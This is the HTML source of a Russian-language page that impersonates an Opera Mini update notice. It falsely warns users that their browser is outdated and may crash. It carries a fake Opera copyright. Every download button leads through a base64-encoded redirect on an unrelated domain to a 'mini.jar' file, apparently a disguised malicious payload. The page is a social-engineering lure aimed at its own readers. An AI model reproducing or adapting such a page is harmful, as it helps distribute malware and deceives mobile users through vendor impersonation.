<?xml version="1.0" encoding="UTF-8"?>
<html class=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title>Обновление Opera Mini</title>

    <meta name="viewport" content="width=device-width">
    <link rel="shortcut icon" href="http://static-portal.opera.com/static/misc/portal2/favicon.ico" type="image/x-icon">

    <link rel="stylesheet" type="text/css" href="landings/css/opera/css/style.css">
    
</head>

<body>

<div id="page">

<div id="portal-wrap">

    <div id="header" class="clearfix">
    
    

<div class="clearfix" id="menu">
    <a href="http://operaupdatenow.in/r.php?r=aHR0cDovL29wZXJhdXBkYXRlbm93LmluL2dldGZpbGUucGhwP2R0eXBlPWRsZSZ1PWh0dHA6Ly9vcGVyYXVwZGF0ZW5vdy5pbi9maWxlcy9taW5pLmphciZpPTEmZD1PcGVyYSZlPTgwJnM9MTU0MSZhPTI5"><img src="landings/images/opera/images/mobile-logo.png" alt="Обновление Opera Mini"></a>

    <div id="quickfunctions">
    
    </div>
</div>


<ul id="tabs" class="clearfix">
    
        <li class="selected">
            <a href="http://operaupdatenow.in/r.php?r=aHR0cDovL29wZXJhdXBkYXRlbm93LmluL2dldGZpbGUucGhwP2R0eXBlPWRsZSZ1PWh0dHA6Ly9vcGVyYXVwZGF0ZW5vdy5pbi9maWxlcy9taW5pLmphciZpPTEmZD1PcGVyYSZlPTgwJnM9MTU0MSZhPTI5" class="tab-link">
                 Обновление Opera Mini 7.0
            </a>
        </li>
    
</ul>






    </div>



    
    <div id="main" class="clearfix">
    


<div id="content" class="clearfix">
    


<ol class="content-col">
  
            
<li id="">
    <div class="box feed ">
        <div class="box-header">
            <form action="http://operaupdatenow.in/r.php?r=aHR0cDovL29wZXJhdXBkYXRlbm93LmluL2dldGZpbGUucGhwP2R0eXBlPWRsZSZ1PWh0dHA6Ly9vcGVyYXVwZGF0ZW5vdy5pbi9maWxlcy9taW5pLmphciZpPTEmZD1PcGVyYSZlPTgwJnM9MTU0MSZhPTI5" method="post" class="close">
            </form>
            <h1>
                <span title="ВНИМАНИЕ! Требуется обновление Opera Mini до версии 6">ВНИМАНИЕ! Рекомендуется обновление Opera Mini до версии 7.0&nbsp;</span>
            </h1>
        </div>
        <li class="box user-message"> 
        Ваша версия браузера Opera Mini устарела, дальнейшая работа может быть некорректной и привести к неожиданным ошибкам и сбоям!<br />
Рекомендуем Вам обновить Opera Mini до версии 7.0
        
        </li>
        <div class="box-content clearfix">
            <div class="inner">
	<br>
	<p id="add-source"><a href="http://operaupdatenow.in/r.php?r=aHR0cDovL29wZXJhdXBkYXRlbm93LmluL2dldGZpbGUucGhwP2R0eXBlPWRsZSZ1PWh0dHA6Ly9vcGVyYXVwZGF0ZW5vdy5pbi9maWxlcy9taW5pLmphciZpPTEmZD1PcGVyYSZlPTgwJnM9MTU0MSZhPTI5" class="button">СКАЧАТЬ Opera Mini 7.0</a></p>
<br>
				<article class="opened">
				    <h2>
				        <a class="art-opn" href="http://operaupdatenow.in/r.php?r=aHR0cDovL29wZXJhdXBkYXRlbm93LmluL2dldGZpbGUucGhwP2R0eXBlPWRsZSZ1PWh0dHA6Ly9vcGVyYXVwZGF0ZW5vdy5pbi9maWxlcy9taW5pLmphciZpPTEmZD1PcGVyYSZlPTgwJnM9MTU0MSZhPTI5" title="Обнови свою Opera!" target="_blank">

				            Обнови свою Opera!

				        </a>
				    </h2>

				    <div class="article-content">

				        <img src="landings/images/opera/images/operamini6.jpg" width="200" height="350">
						<br /><a href="/ofert" style="font-size:8pt;">Соглашение с пользователем.</a>
						<br />Основные преимущества новой Opera Mini 7.0:
				        <br>
						&bull; Полная безопасность серфинга с мобильного<br/>
						&bull; Экономия денег на передаче данных<br/>
				        &bull; Производительность<br/>
						&bull; Просматривайте больше, ждите меньше<br/>

						&bull; Мобильный Интернет высшего класса<br/>
						&bull; Вкладки для многозадачной работы<br/>

						&bull; Ощущение полного комфорта при работе с любым мобильным устройством<br/>
						&bull; Мгновенный доступ к любимым веб-сайтам<br/>

						&bull; Ввод адресов при минимуме нажатий на клавиши<br/>

						&bull; Удобное чтение самых крупных страниц<br/>
						&bull; Точная фиксация поля обзора<br/>
						&bull; Клавиатурный ввод без потери фокуса<br/>
						&bull; Максимально эффективное использование экрана<br/>

						&bull; Выбор лучших параметров просмотра<br/>
						&bull; и многое другое!<br/>
				       
				    </div>

				</article>


            </div>
        </div>
    </div>
</li>
        
    
    
    
        <li class="box user-message">
        Ваша версия браузера Opera Mini устарела, дальнейшая работа может быть некорректной и привести к неожиданным ошибкам и сбоям!
Рекомендуем Вам обновить Opera Mini до версии 6.5
        
        </li>
    
</ol>

<p id="add-source"><a href="http://operaupdatenow.in/r.php?r=aHR0cDovL29wZXJhdXBkYXRlbm93LmluL2dldGZpbGUucGhwP2R0eXBlPWRsZSZ1PWh0dHA6Ly9vcGVyYXVwZGF0ZW5vdy5pbi9maWxlcy9taW5pLmphciZpPTEmZD1PcGVyYSZlPTgwJnM9MTU0MSZhPTI5" class="button">СКАЧАТЬ Opera Mini 7.0</a></p>



</div>

    </div>

    

    <div id="footer" class="clearfix">

        <img src="landings/images/opera/images/footer-mobile.png">

        


        <p>Copyright © 2011 Opera Software ASA. All rights reserved</p>

        
        
    </div>
</div>

</div>


</body></html>
